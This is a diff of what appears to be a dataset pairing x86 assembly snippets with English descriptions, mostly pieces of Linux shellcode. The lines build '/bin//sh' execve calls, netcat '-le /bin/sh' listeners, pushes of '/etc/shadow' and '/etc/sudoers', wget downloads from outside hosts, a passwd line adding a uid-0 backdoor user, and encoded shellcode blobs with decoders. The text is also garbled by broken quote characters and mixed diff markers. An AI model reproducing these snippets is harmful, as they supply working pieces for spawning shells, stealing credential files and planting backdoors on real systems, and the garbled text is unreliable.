  push 0x7372656f push the 0x7372656f onto the stack
4005
  push 0x7372656f push 0x7372656f to the stack
4006
  push 0x7372656f push 0x7372656f onto the stack
4007
- push 0x7372656f \n push 0x6475732f \n push 0x6374652f push �/etc/sudoers� on stack
4008
- push 0x7372656f \n push 0x6475732f \n push 0x6374652f push �/etc/sudoers� into stack
4009
  push 0x7374736f push 0x7374736f onto the stack
4010
  push 0x7374736f push the 0x7374736f onto the stack
4011
  push 0x7374736f \n push 0x682f6374 \n push 0x652f2f2f push the string ///etc/hosts on stack
@@ -4035,8 +4035,8 @@ push 0x7665642f push the 0x7665642f onto the stack
4035
  push 0x76766c2d push 0x76766c2d onto the stack
4036
  push 0x76766c2d push 0x76766c2d to the stack
4037
  push 0x76766c2d push the 0x76766c2d onto the stack
4038
- push 0x776f6461 \n push 0x68732f63 \n push 0x74652f2f push the string �//etc/shadow� on stack
4039
- push 0x776f6461 \n push 0x6873672f \n push 0x6374652f \n mov ebx, esp load the string �/etc/gshadow� into ebx regsiter
4040
  push 0x776f6490 \n pop ebx load hexadecimal value 0x776f6490 into ebx register
4041
  push 0x78 push 0x78 onto the stack
4042
  push 0x78 push 0x78 to the stack
@@ -4334,9 +4334,9 @@ push dword 0x62732f2f \n mov ebx, esp push the doubleword 0x62732f2f onto the st
4334
  push dword 0x6374652f push the dword 0x6374652f onto the stack
4335
  push dword 0x64616568 push the dword 0x64616568 onto the stack
4336
  push dword 0x64777373 push the dword 0x64777373 onto the stack
4337
- push dword 0x6567772f \n push dword 0x6e69622f \n push dword 0x7273752f \n mov ebx, esp push edx, the byte +0x74 and the chined double words �/usr/bin/wge� into ebx register
4338
  push dword 0x656e7265 push the dword 0x656e7265 onto the stack
4339
- push dword 0x682f6365 \n push dword 0x78652f2f \n push dword 0x6f692e62 \n push dword 0x75687469 \n push dword 0x672e6d34 \n push dword 0x626d3362 push the string b3mb4m.github.io//exec/h� on stack as chained double words
4340
  push dword 0x68732f2f push hs// onto stack
4341
  push dword 0x68732f2f push the dword 0x68732f2f onto the stack
4342
  push dword 0x68732f63 push the dword 0x68732f63 onto the stack
@@ -4420,7 +4420,7 @@ push eax push the value of register eax onto the stack
4420
  push eax \n inc eax push eax on stack then increment its conent
4421
  push eax \n mov ebx, esp push the contents of the eax register onto the stack and point ebx to the stack register
4422
  push eax \n mov ecx, esp push the contents of the eax register onto the stack and point ecx to the stack register
4423
- push eax \n mov edi, 0x343997b7 \n rol edi, 1 \n push edi \n mov esi, 0xd2c45e5e \n ror esi, 1 \n push esi push null terminating string and �/bin/sh� to the stack
4424
  push eax \n mov edx, esp clear edx
4425
  push eax \n mov edx, esp push null in the edx position
4426
  push eax \n mov edx, esp clear eax register
@@ -4439,23 +4439,23 @@ push eax \n push 0x30 push eax and the hexadecimal value 0x30 on the stack
4439
  push eax \n push 0x31373737 \n push 0x3170762d \n mov esi, esp load chained null and the arg -vp17771 into esi register
4440
  push eax \n push 0x35353535 \n push 0x70746c2d \n mov ecx, esp push 0, port number = 5555, command -ltp on stack. ecx point to the top pf the stack.
4441
  push eax \n push 0x39393939 \n push 0x39706c2d push 0-term, 9999, 9pl- on the stack
4442
- push eax \n push 0x4b434148 push null terminated string �hack� on stack
4443
  push eax \n push 0x636e2f2f \n push 0x6e69622f \n mov ebx, esp load chained null and the arg /bin//nc into ebx register
4444
  push eax \n push 0x636e2f6e \n push 0x69622f2f push 0-term, cn/n, ib// on the stack
4445
  push eax \n push 0x6769666e \n push 0x6f635f64 \n push 0x6873732f \n push 0x6873732f \n push 0x6374652f push 0-term, gifn, oc_d, hss/, hss/, cte/ on the stack
4446
- push eax \n push 0x68732f2f \n push 0x6e69622f \n mov ebx, esp load �/bin//sh\0 intp ebx register
4447
- push eax \n push 0x68732f2f \n push 0x6e69622f \n mov ebx, esp load �/bin//sh\0 into ebx register
4448
  push eax \n push 0x68732f2f \n push 0x6e69622f \n push 0x2f656c2d \n mov edi, esp load chained null and the arg -le//bin//sh into edi register
4449
  push eax \n push 0x68732f2f \n push 0x6e69622f \n push 0x2f656c2d \n mov edx, esp load chained null and the arg -le//bin//sh into edx register
4450
- push eax \n push 0x68732f2f \n push 0x6e69622f \n push ebx, esp \n mov edx, eax \n mov al, 0xb \n int 0x80 execute execve syscall putting null temrinated string �/bin//sh� into ebx register, the parameter 0 into edx and the syscall code into al register.
4451
  push eax \n push 0x68732f6e \n push 0x69622f2f \n mov ebx, esp load the string //bin/sh\0 into ebx regsiter
4452
  push eax \n push 0x68736162 \n push 0x2f6e6962 \n push 0x2f2f652d push 0-term, hsab, /nib, //e- on the stack
4453
- push eax \n push 0x6c6c6568 \n push 0x2f6d3462 \n push 0x6d33622f \n push 0x2f2f2f6d \n push 0x6f632e73 \n push 0x616d6978 \n push 0x656d2e33 \n mov ecx, esp save null terminated string 3.meximas.com////b3mb4m/hell� into ecx register
4454
- push eax \n push 0x7361642f \n push 0x6e69622f \n mov ebx, esp load null terminate string �/bin/das� into ebx regsiter
4455
  push eax \n push 0x7461632f \n push 0x6e69622f push 0-term, tac/, nib/ on the stack
4456
- push eax \n push 0x74656777 \n push 0x2f6e6962 \n push 0x2f727375 \n push 0x2f2f2f2f \n mov ebx, esp load null terminated string �////usr/bin/wget� intp ebx regsiter
4457
- push eax \n push 0x746f6f62 \n push 0x65722f6e \n push 0x6962732f \n mov ebx, esp load null temrinated string �/sbin/reboot� into ebx register
4458
- push eax \n push 0x746f6f62 \n push 0x65722f6e \n push 0x6962732f \n mov ebx, esp load null terminated string �sbin/reboot� into ebx register
4459
  push eax \n push byte +0x68 \n mov ebx,esp load eax content and the byte +0x68 into ebx register
4460
  push eax \n push byte 0x1 \n push byte 0x2 push the parameters (0, sock_stream =1, af_inet=2) on stack
4461
  push eax \n push byte 0x1 \n push byte 0x2 \n mov ecx, esp push the protocol 0, the type, sock_stream, and the domain af_inet on the stack and then load the stack pointer into ecx register
@@ -4484,7 +4484,7 @@ push eax \n push edx \n push esi \n push ebx push eax, edx, esi, ebx contents on
4484
  push eax \n push esi \n push ebx push eax, esi and bx contents on the stack
4485
  push eax \n push esi \n push edi \n push ebx push eax, esi, edi and ebx contents on stack
4486
  push eax \n push esp push eax and esp register on the stack
4487
- push eax \n push word 0x6873 \n push 0x61622f2f \n push 0x6e69622f \n mov ebx,esp load the string �/bin//bash\0 into ebx register
4488
  push eax \n xor eax, eax \n mov al, 1 push eax register on the satck than clear it and put the number of the syscall exit in its laast byte
4489
  push ebp save old base pointer
4490
  push ebp save the old base pointer value
@@ -4503,7 +4503,7 @@ push ebx push the sock file descriptor stored in ebx
4503
  push ebx "push ""/bin/sh"" on stack"
4504
  push ebx push ebx(0) onto stack (ipproto_ip = 0)
4505
  push ebx push ebx(1) onto stack (sock_stream = 1)
4506
- push ebx push the string �////bin/bash� on tsack
4507
  push ebx push the pointer to /bin/bash
4508
  push ebx push ptr addr on stack
4509
  push ebx push pointer
@@ -4573,18 +4573,18 @@ push ecx \n mov ecx,esp push ecx on the stack and then place pointer to ecx
4573
  push ecx \n mov edx,esp push ecx on the stack and then place pointer to edx
4574
  push ecx \n pop edi load ecx contents into edi register
4575
  push ecx \n push 0x2 \n push 0x2 push ecx content, the value 0x2 two times on stack
4576
- push ecx \n push 0x64777373 \n push 0x61702f2f \n push 0x6374652f \n mov ecx,esp load �/etc//passwd� and null teminating string into ecx register
4577
- push ecx \n push 0x68732f2f \n push 0x6e69622f \n mov ebx, esp load �/bin//sh\0 on ebx register
4578
  push ecx \n push 0x68732f2f \n push 0x6e69622f \n mov ebx,esp push the string /bin//sh\0\0\0\0\0\0\0\0 on the stack and place pointer to eb
4579
- push ecx \n push 0x68736162 \n push 0x2f6e6962 \n push 0x2f2f2f2f push ecx cotent, �hsab�, �/nib� and �////� on stack
4580
- push ecx \n push 0x7461632f \n push 0x6e69622f \n mov ebx,esp load �/bin/cat� and null teminating string into ebx register
4581
  push ecx \n push 0x8 \n push edx \n push esi \n mov ecx, esp load ecx content, hexadecimal value 0x8, edx content, esi content into ecx register
4582
- push ecx \n push 0xb \n pop eax \n push 0x68732f2f \n push 0x6e69622f \n mov ebx,esp load __nr_execve syscall into eax register and the string �/bin//sh\0 into ebx register
4583
- push ecx \n push dword 0x68732f2f \n push dword 0x6e69622f \n mov ebx, esp load �/bin//sh\0 into ebx register
4584
  push ecx \n push eax push the pointer to sockaddr and the fd received previously on stack
4585
  push ecx \n push ebx push ecx and ebx content on stack
4586
  push ecx \n push ebx \n mov ecx,esp load the string /usr/bin/wget 192.168.1.93//x </dev/null2<&1 in ecx register
4587
- push ecx \n push ebx \n pop ebx save null terminating string �/bin/sh� into ebx
4588
  push ecx \n push ebx \n push dword 0x2 \n mov ecx, esp push ecx and ebx contents and 32 bit equal to 2 on the stack and then put esp in ecx
4589
  push ecx \n push ecx \n push esi push the value 0 to the stack for 2 times and then push esi
4590
  push ecx \n push esi push ecx and esi contents on the stack
@@ -4596,7 +4596,7 @@ push edi push the string //sbin// on the stack
4596
  push edi push edi content on the stack
4597
  push edi "push ""c-"" on stack"
4598
  push edi push edi content
4599
- push edi push �-c� value on stack
4600
  push edi push the edi onto the stack
4601
  push edi push edi to the stack
4602
  push edi push the contents of the edi register onto the stack
@@ -4645,15 +4645,15 @@ push edx push the contents of the edx register onto the stack
4645
  push edx push the value of register edx onto the stack
4646
  push edx push edx onto the stack
4647
  push edx push edx on the stack
4648
- push edx \n mov eax, 0xb33fb33f \n sub eax, 0x3bd04ede \n push eax push null terminated string �adow� on stack
4649
  push edx \n mov eax, esp push the contents of the edx register onto the stack and point eax to the stack register
4650
  push edx \n mov ebx, esp push the contents of the edx register onto the stack and point ebx to the stack register
4651
  push edx \n mov ecx, esp push the contents of the edx register onto the stack and point ecx to the stack register
4652
- push edx \n push 0x6563726f \n push 0x666e6574 \n push 0x65732f6e \n push 0x6962732f \n push 0x7273752f push null termination string and the string �/usr/sbin/setenforce� on the stack
4653
  push edx \n push 0x68732f2f \n push 0x6e69622f push null terminated /bin//sh on stack
4654
  push edx \n push 0x68732f2f \n push 0x6e69622f \n mov ebx, esp push /bin//sh +\x00 on the stack and then point ebx where that string is located
4655
- push edx \n push 0x68732f2f \n push 0x6e69622f \n mov ebx, esp load null bytes, �//sh� and �/bin� into ebx register
4656
- push edx \n push 0x68732f2f \n push 0x6e69622f \n mov ebx,esp load �/bin//sh\0 into ebx register
4657
  push edx \n push 0x68735858 push edx and the hexadecimal value 0x68735858 on the stack
4658
  push edx \n push byte 0x30 push edx and the value 0x30 onto the stack
4659
  push edx \n push byte 0x77 \n push word 0x6f64 \n mov esi, 0x222933f0 \n add esi, 0x3f3f3f3f \n push esi \n xor esi, esi \n mov esi, 0x243525f0 \n add esi, 0x3f3f3f3f \n push esi \n xor esi, esi \n mov ebx, esp load the string /cte/shadow on ebx register
@@ -4712,7 +4712,7 @@ push esi \n mov ebx, esp push the contents of the esi register onto the stack an
4712
  push esi \n mov ecx, esp push the contents of the esi register onto the stack and point ecx to the stack register
4713
  push esi \n mov edi, esi push the stack onto esi and move the contents on edi
4714
  push esi \n mov edx, esp push the contents of the esi register onto the stack and point edx to the stack register
4715
- push esi \n push 0x68732f2f \n push 0x6e69622f push null terminated string �/bin//sh� on stack
4716
  push esi \n push edi push /bin//sh in stack
4717
  push esi \n push edi push esi and edi content on stack
4718
  push esi \n push edi \n push edx push esi, edi and edx content on stack
@@ -4742,7 +4742,7 @@ push word [edx] push edx content as a word on stack
4742
  push word [edx] push the word [edx] onto the stack
4743
  push word [edx] push the word [edx] to the stack
4744
  push word 0544o push the word 0544o onto the stack
4745
- push word 0544o \n pop ecx allow permissions r-xr--r�save them into ecx
4746
  push word 0644o push the word 0644o onto the stack
4747
  push word 0666q set read-write permission
4748
  push word 0666q push the word 0666q onto the stack
@@ -4784,7 +4784,7 @@ push word 0x3905 push the word 0x3905 onto the stack
4784
  push word 0x3930 push the word 0x3930 onto the stack
4785
  push word 0x401f push the word 0x401f onto the stack
4786
  push word 0x4255 push the word 0x4255 onto the stack
4787
- push word 0x462d push �-f� on stack
4788
  push word 0x462d push the word 0x462d to the stack
4789
  push word 0x462d push the word 0x462d onto the stack
4790
  push word 0x5000 push 0x5000 onto stack port
@@ -4806,8 +4806,8 @@ push word 0x5c11 push the word 0x5c11 onto the stack
4806
  push word 0x5c11 push the word 0x5c11 to the stack
4807
  push word 0x632d push -c param on the stack
4808
  push word 0x632d push the word paramenter -c on the stack
4809
- push word 0x632d push the parameter �c-� as a word on stack
4810
- push word 0x632d push the value �-c� on stack
4811
  push word 0x632d push the word 0x632d onto the stack
4812
  push word 0x632d push the word 0x632d to the stack
4813
  push word 0x632d \n mov eax, esp push the word 0x632d onto the stack and point the eax register to the stack register
@@ -5021,7 +5021,7 @@ shellcode: define shellcode_ label
5021
  shellcode: define shellcode label
5022
  shellcode: declare the shellcode label
5023
  shellcode: db 'vl43ck:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:vl43ck:/tmp:/bin/bash' define the array of bytes shellcode and initialize it to vl43ck:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:vl43ck:/tmp:/bin/bash
5024
- "shellcode: db ""vl43ck:$6$bxwjfzor$muhuwo0mugdkwfppeydqgzpm.ytpmi/gam4lvqhp21lfnwmsj821kvjniyoodytbh.sf9ar7ciqbrccw5bgjx0:0:0:vl43ck:/tmp:/bin/bash�" "define the shellcode: ""vl43ck:$6$bxwjfzor$muhuwo0mugdkwfppeydqgzpm.ytpmi/gam4lvqhp21lfnwmsj821kvjniyoodytbh.sf9ar7ciqbrccw5bgjx0:0:0:vl43ck:/tmp:/bin/bash�"
5025
  shellcode: db 0x0e,0x3a,0x94,0x12,0x12,0x12,0xb2,0x9b,0x37,0xc3,0x52,0xb6,0x9d,0xa2,0xc2,0x9d,0xa4,0x1e,0x9d,0xa4,0xe6,0x9d,0x84,0xfa,0x21,0x49,0xdc,0xf8,0xc3,0x11,0x7e,0xce,0xb3,0x8e,0x14,0xfe,0xf2,0x53,0x61,0x1f,0x13,0x59,0x34,0x04,0xa4,0xa9,0x9d,0xa4,0xe2,0x9d,0xdc,0xce,0x9d,0xde,0xe3,0x8a,0x35,0xda,0x13,0x23,0xa3,0x9d,0xab,0xf2,0x13,0x25,0x9d,0xdb,0xea,0x35,0xcc,0xdb,0x9d,0xc6,0x9d,0x13,0x28,0xc3,0x11,0x7e,0x53,0x61,0x1f,0x13,0x59,0xca,0x32,0x87,0x08,0x15,0x8f,0x0a,0xcd,0x8f,0xf6,0x87,0x36,0xaa,0x9d,0xaa,0xf6,0x13,0x25,0xb8,0x9d,0x1e,0xdd,0x9d,0xaa,0xee,0x13,0x25,0x9d,0x16,0x9d,0x13,0x22,0x9b,0xd6,0xf6,0xf6,0xad,0xad,0xb3,0xab,0xac,0xa3,0x11,0x32,0xb1,0xb1,0xac,0x9d,0xe4,0x3d,0x9f,0xaf,0xba,0xc5,0xc4,0x12,0x12,0xba,0x89,0x85,0xc4,0xb1,0xa6,0xba,0xde,0x89,0xf8,0x19,0x11,0x27,0x4a,0x62,0x13,0x12,0x12,0xfb,0x56,0xa6,0xa2,0xba,0xfb,0x92,0xbd,0x12,0x11,0x27,0xa2,0xa2,0xa2,0xa2,0xd2,0xa2,0xd2,0xa2,0xba,0x3c,0x21,0x31,0x32,0x11,0x27,0x69,0xbc,0x17,0xba,0x52,0x7a,0x86,0x59,0xba,0x14,0x12,0x13,0x4d,0x9b,0x38,0xbc,0xe2,0xa8,0xa9,0xba,0x6b,0x77,0x86,0xb3,0x11,0x27,0x97,0x52,0x86,0x1e,0x11,0xe0,0x1a,0x87,0x3e,0xba,0x02,0x47,0x74,0xa8,0x11,0x27,0xba,0xb5,0xbf,0xb6,0x12,0x9b,0x35,0xa9,0xa9,0xa9,0xc3,0x08,0xbc,0xe4,0xab,0xa8,0x34,0x0f,0xb8,0x59,0xd6,0xf6,0xce,0x13,0x13,0x9f,0xd6,0xf6,0xe2,0x58,0x12,0xd6,0xa6,0xa2,0xa8,0xa8,0xa8,0xd8,0xa8,0xe0,0xa8,0xa8,0xa5,0xa8,0xba,0x8b,0x5e,0xd1,0x98,0x11,0x27,0x9b,0x32,0xe0,0xa8,0xd8,0x11,0xc2,0xba,0x1a,0x99,0xef,0xb2,0x11,0x27,0x4d,0x02,0x47,0x74,0xa8,0xba,0x78,0x67,0x4f,0x6f,0x11,0x27,0xce,0x18,0x8e,0x1c,0x92,0x0d,0x32,0x87,0x17,0x4d,0xd9,0xe5,0x84,0xc1,0xbc,0x12,0xa5,0x11,0x27,0x88 define shellcode as the array of bytes 0x0e,0x3a,0x94,0x12,0x12,0x12,0xb2,0x9b,0x37,0xc3,0x52,0xb6,0x9d,0xa2,0xc2,0x9d,0xa4,0x1e,0x9d,0xa4,0xe6,0x9d,0x84,0xfa,0x21,0x49,0xdc,0xf8,0xc3,0x11,0x7e,0xce,0xb3,0x8e,0x14,0xfe,0xf2,0x53,0x61,0x1f,0x13,0x59,0x34,0x04,0xa4,0xa9,0x9d,0xa4,0xe2,0x9d,0xdc,0xce,0x9d,0xde,0xe3,0x8a,0x35,0xda,0x13,0x23,0xa3,0x9d,0xab,0xf2,0x13,0x25,0x9d,0xdb,0xea,0x35,0xcc,0xdb,0x9d,0xc6,0x9d,0x13,0x28,0xc3,0x11,0x7e,0x53,0x61,0x1f,0x13,0x59,0xca,0x32,0x87,0x08,0x15,0x8f,0x0a,0xcd,0x8f,0xf6,0x87,0x36,0xaa,0x9d,0xaa,0xf6,0x13,0x25,0xb8,0x9d,0x1e,0xdd,0x9d,0xaa,0xee,0x13,0x25,0x9d,0x16,0x9d,0x13,0x22,0x9b,0xd6,0xf6,0xf6,0xad,0xad,0xb3,0xab,0xac,0xa3,0x11,0x32,0xb1,0xb1,0xac,0x9d,0xe4,0x3d,0x9f,0xaf,0xba,0xc5,0xc4,0x12,0x12,0xba,0x89,0x85,0xc4,0xb1,0xa6,0xba,0xde,0x89,0xf8,0x19,0x11,0x27,0x4a,0x62,0x13,0x12,0x12,0xfb,0x56,0xa6,0xa2,0xba,0xfb,0x92,0xbd,0x12,0x11,0x27,0xa2,0xa2,0xa2,0xa2,0xd2,0xa2,0xd2,0xa2,0xba,0x3c,0x21,0x31,0x32,0x11,0x27,0x69,0xbc,0x17,0xba,0x52,0x7a,0x86,0x59,0xba,0x14,0x12,0x13,0x4d,0x9b,0x38,0xbc,0xe2,0xa8,0xa9,0xba,0x6b,0x77,0x86,0xb3,0x11,0x27,0x97,0x52,0x86,0x1e,0x11,0xe0,0x1a,0x87,0x3e,0xba,0x02,0x47,0x74,0xa8,0x11,0x27,0xba,0xb5,0xbf,0xb6,0x12,0x9b,0x35,0xa9,0xa9,0xa9,0xc3,0x08,0xbc,0xe4,0xab,0xa8,0x34,0x0f,0xb8,0x59,0xd6,0xf6,0xce,0x13,0x13,0x9f,0xd6,0xf6,0xe2,0x58,0x12,0xd6,0xa6,0xa2,0xa8,0xa8,0xa8,0xd8,0xa8,0xe0,0xa8,0xa8,0xa5,0xa8,0xba,0x8b,0x5e,0xd1,0x98,0x11,0x27,0x9b,0x32,0xe0,0xa8,0xd8,0x11,0xc2,0xba,0x1a,0x99,0xef,0xb2,0x11,0x27,0x4d,0x02,0x47,0x74,0xa8,0xba,0x78,0x67,0x4f,0x6f,0x11,0x27,0xce,0x18,0x8e,0x1c,0x92,0x0d,0x32,0x87,0x17,0x4d,0xd9,0xe5,0x84,0xc1,0xbc,0x12,0xa5,0x11,0x27,0x88
5026
  shellcode: db 0x18,0x38,0xc7,0x57,0x6f,0x36,0x36,0x7a,0x6f,0x6f,0x36,0x69,0x70,0x75,0x90,0xea,0x38,0xd0,0x90,0xd1,0x71,0x12,0x5f,0xd4,0x87 define shellcode as array of bytes 0x18,0x38,0xc7,0x57,0x6f,0x36,0x36,0x7a,0x6f,0x6f,0x36,0x69,0x70,0x75,0x90,0xea,0x38,0xd0,0x90,0xd1,0x71,0x12,0x5f,0xd4,0x87
5027
  shellcode: db 0x31,0xc0,0x31,0xdb,0x31,0xc9,0x31,0xd2,0xb2,0xa4,0xeb,0x1f,0x5e,0x8d,0x3e,0x8a,0x1c,0x0f,0x88,0xdf,0x88,0xd0,0x30,0xd8,0x74,0x16,0x66,0x8b,0x44,0x0f,0x01,0x66,0x31,0xd8,0x66,0x89,0x07,0x41,0x8d,0x7f,0x02,0xeb,0xe4,0xe8,0xdc,0xff,0xff,0xff,0x7d,0x4c,0xa6,0x09,0xfe,0xea,0xd8,0x8b,0x9b,0x0c,0x5f,0x66,0x30,0x32,0xb9,0x07,0xe6,0xb7,0x0f,0x69,0xc2,0xab,0x2b,0xf0,0x3e,0x60,0x6c,0xea,0x82,0xe8,0x63,0x63,0x72,0x68,0x34,0x02,0xeb,0xfb,0xba,0xef,0xbf,0x66,0xf4,0x15,0x9e,0xbb,0xdd,0xe3,0x73,0xbe,0xf3,0xbb,0x32,0xfa,0xeb,0xef,0x58,0x20,0x24,0x90,0xe3,0x85,0x2e,0x64,0xe4,0x27,0x59,0xe9,0x3f,0xee,0x23,0x6e,0x63,0xf0,0x3a,0x47,0x2d,0x78,0x68,0x30,0xa5,0x66,0xe6,0x2f,0x69,0x10,0x91,0xfa,0x92,0xd5,0x3e,0x11,0x4d,0xf4,0x9c,0x9c,0x16,0x39,0x74,0xa0,0xc9,0xce,0xd2,0x5b,0x31,0x5c,0x0c,0x0f,0xfb,0x72,0x1a,0xb6,0x06,0xbd,0xd1,0x1c,0x51,0xa4 shellcode contains the bytes 0x31,0xc0,0x31,0xdb,0x31,0xc9,0x31,0xd2,0xb2,0xa4,0xeb,0x1f,0x5e,0x8d,0x3e,0x8a,0x1c,0x0f,0x88,0xdf,0x88,0xd0,0x30,0xd8,0x74,0x16,0x66,0x8b,0x44,0x0f,0x01,0x66,0x31,0xd8,0x66,0x89,0x07,0x41,0x8d,0x7f,0x02,0xeb,0xe4,0xe8,0xdc,0xff,0xff,0xff,0x7d,0x4c,0xa6,0x09,0xfe,0xea,0xd8,0x8b,0x9b,0x0c,0x5f,0x66,0x30,0x32,0xb9,0x07,0xe6,0xb7,0x0f,0x69,0xc2,0xab,0x2b,0xf0,0x3e,0x60,0x6c,0xea,0x82,0xe8,0x63,0x63,0x72,0x68,0x34,0x02,0xeb,0xfb,0xba,0xef,0xbf,0x66,0xf4,0x15,0x9e,0xbb,0xdd,0xe3,0x73,0xbe,0xf3,0xbb,0x32,0xfa,0xeb,0xef,0x58,0x20,0x24,0x90,0xe3,0x85,0x2e,0x64,0xe4,0x27,0x59,0xe9,0x3f,0xee,0x23,0x6e,0x63,0xf0,0x3a,0x47,0x2d,0x78,0x68,0x30,0xa5,0x66,0xe6,0x2f,0x69,0x10,0x91,0xfa,0x92,0xd5,0x3e,0x11,0x4d,0xf4,0x9c,0x9c,0x16,0x39,0x74,0xa0,0xc9,0xce,0xd2,0x5b,0x31,0x5c,0x0c,0x0f,0xfb,0x72,0x1a,0xb6,0x06,0xbd,0xd1,0x1c,0x51,0xa4
@@ -5208,16 +5208,16 @@ sub dx, bx subtract the contents of bx from the contents of dx
5208
  sub dx, bx subtract bx from dx
5209
  sub eax, [esp] subtract the value of the memory at address esp from eax and store into eax
5210
  sub eax, 0x013ffeff subtract 0x013ffeff from the contents in eax and save the result in eax
5211
- sub eax, 0x013ffeff \n push eax push in/c� on stack
5212
  sub eax, 0x04feca01 subtract 0x04feca01 from the contents in eax and save the result in eax
5213
- sub eax, 0x04feca01 \n inc eax \n push eax push �/etc� on stack
5214
  sub eax, 0x0efc3532 subtract 0x0efc3532 from the contents in eax and save the result in eax
5215
- sub eax, 0x0efc3532 \n push eax push �//sh� on stack
5216
  sub eax, 0x10 subtract 0x10 from eax
5217
  sub eax, 0x2c3d2dff subtract 0x2c3d2dff from the contents in eax and save the result in eax
5218
  sub eax, 0x2c3d2dff \n push eax push 0777 on stack
5219
  sub eax, 0x3217d6d2 subtract 0x3217d6d2 from the contents in eax and save the result in eax
5220
- sub eax, 0x3217d6d2 \n add eax, 0x31179798 \n push eax push �///b� on stack
5221
  sub eax, 0x3bd04ede subtract 0x3bd04ede from the contents in eax and save the result in eax
5222
  sub eax, 0x70445eaf subtract 0x70445eaf from the contents in eax and save the result in eax
5223
  sub eax, 216 subtract 216 from the value stored in eax
@@ -5243,9 +5243,9 @@ sub ebx, byte 8 subtract the byte value 8 from the contents of ebx and save the
5243
  sub ebx,ebx \n xor ecx,ecx zero out ebx and ecx content
5244
  sub ecx, 0x03030303 subtract 3.3.3.3 from ip address
5245
  sub ecx, 0x04baca01 subtract 0x04baca01 from the contents in ecx and save the result in ecx
5246
- sub ecx, 0x04baca01 \n inc ecx \n push ecx push �/etc� on stack
5247
  sub ecx, 0x0b454440 subtract 0x0b454440 from the contents in ecx and save the result in ecx
5248
- sub ecx, 0x0b454440 \n push ecx push �///h� on stack
5249
  sub ecx, 0x1525152a subtract 0x1525152a from the contents in ecx and save the result in ecx
5250
  sub ecx, 0x6374612e subtract hexadecimal value 0x6374612e to ecx content
5251
  sub ecx, 0x6374612e subtract 0x6374612e from the contents in ecx and save the result in ecx
@@ -5390,7 +5390,7 @@ variablename3: resd 1 reserve 1 double word for variableName3
5390
  word_table dw 134, 345, 564, 123 declare the array of words word_table initialized to 134 345 564 and 123
5391
  word_value dw 300 define the word value word_value and initialize it to 300
5392
  word1 word 65535 define word1 unsigned word and initialize it to 65535
5393
- word2 sword 32768 define word2 signed word and initialize it to -32768
5394
  word3 word ? define word3 uninitialized unsigned word
5395
  wordvar: resw 1 reserve a word for wordvar
5396
  wrap_around: define _wrap_around label
 
131
  add eax, 0x10 add 0x10 to eax
132
  add eax, 0x12345678 add 0x12345678 to the contents in eax and save the result in eax
133
  add eax, 0x2d383638 add 0x2d383638 to the contents in eax and save the result in eax
134
+ add eax, 0x2d383638 \n push eax push ÔhmodÕ on stack
135
  add eax, 0x31179798 add 0x31179798 to the contents in eax and save the result in eax
136
  add eax, 0x5 \n jnz L2 add 0x5 to edx and jump to L2 if the result is not 0
137
  add eax, 0x7 \n jnz L4 add the value 0x7 to eax and jump to the label L4 if the sum is not zero
 
288
  call decoder \n shellcode: db 0x18,0x38,0xc7,0x57,0x6f,0x36,0x36,0x7a,0x6f,0x6f,0x36,0x69,0x70,0x75,0x90,0xea,0x38,0xd0,0x90,0xd1,0x71,0x12,0x5f,0xd4,0x87 go to _decoder label after entering the address of the array shellcode (0x18,0x38,0xc7,0x57,0x6f,0x36,0x36,0x7a,0x6f,0x6f,0x36,0x69,0x70,0x75,0x90,0xea,0x38,0xd0,0x90,0xd1,0x71,0x12,0x5f,0xd4,0x87) on the top of the stack
289
  call decoder \n shellcode: db 0x3e,0xcd,0x5d,0x75,0x3c,0x3c,0x80,0x75,0x75,0x3c,0x6f,0x76,0x7b,0x96,0xf0,0x5d,0x96,0xef,0x60,0x96,0xee,0xbd,0x18,0xda,0x8d go to _decoder label after entering shellcode (db 0x3e,0xcd,0x5d,0x75,0x3c,0x3c,0x80,0x75,0x75,0x3c,0x6f,0x76,0x7b,0x96,0xf0,0x5d,0x96,0xef,0x60,0x96,0xee,0xbd,0x18,0xda,0x8d) address on the top of the stack
290
  call decoder \n shellcode: db 0x4b,0xf7,0x13,0x59,0xcc,0x8c,0x63,0x5e,0x9f,0x8d,0x99,0x9f,0x1f,0xa4,0x3b,0x6e,0xc6,0x36,0x23 \n shellcodelen equ $-shellcode shellcode address will be pushed into the stack
291
+ call decoder \n shellcode: db 0x62,0x60,0xa0,0x34,0x5e,0x97,0xe6,0x34,0xd0,0x97,0xc4,0xb4,0xdc,0xc4,0xc7,0x28,0x13,0x71,0xa6,0xc4,0xc3,0x58,0x16,0xe6,0x01 go to _decoder label after entering shellcode Ô0x62,0x60,0xa0,0x34,0x5e,0x97,0xe6,0x34,0xd0,0x97,0xc4,0xb4,0xdc,0xc4,0xc7,0x28,0x13,0x71,0xa6,0xc4,0xc3,0x58,0x16,0xe6,0x01Õ on the top of the stack
292
  call decoder \n xor dword ptr [edx-0x55af5540],ebp xoring ebp content with the double word at the adress edx-0x55af5540 then go to decoder label
293
  call decoder_setup call decoder_setup
294
  call decoder1 \n xor_value: db 0xaa, 0xaa, 0xaa, 0xaa, 0xaa, 0xaa, 0xaa, 0xaa \n rot_value: db 13, 13, 13, 13, 13, 13, 13, 13 \n shellcode: db 0x94,0x67,0xf7,0xdf,0x96,0x96,0x2a,0xdf,0xdf,0x96,0xc5,0xdc,0xd1,0x3c,0x5a,0xf7,0x3c,0x45,0xca,0x3c,0x44,0x17,0xb2,0x70,0x27 jump to decoder1_label afetr entering xor_value, rot_value and shellcode on the top pf the stack
 
299
  call esi call the function in esi
300
  call esp call esp
301
  call execute call the execute function
302
+ "call execute \n db ""cp /bin/sh /tmp/shÓ" "put db ""cp /bin/sh /tmp/shÓ address on stack then jump to _esecute label"
303
  call internetreadfile call function internetreadfile
304
  call iprint call the iprint function
305
  call iprintlf call the iprintlf function
 
323
  call set_argv call the set_argv function
324
  "call set_argv \n cmd: db ""cat /etc/passwd;echo do__ne""" "go to _set_argv label afeter entering the byte string cmd = cat /etc/passwd;echo do__ne on stack"
325
  call shell_ret call the shell_ret function
326
+ call shell_ret \n db Ò/bin/shÓ go to shell_ret label after ebtering byte string Ò/bin/shÓ address on stack
327
  call shellcode jump to the address of shellcode_label
328
  call shellcode call the shellcode function
329
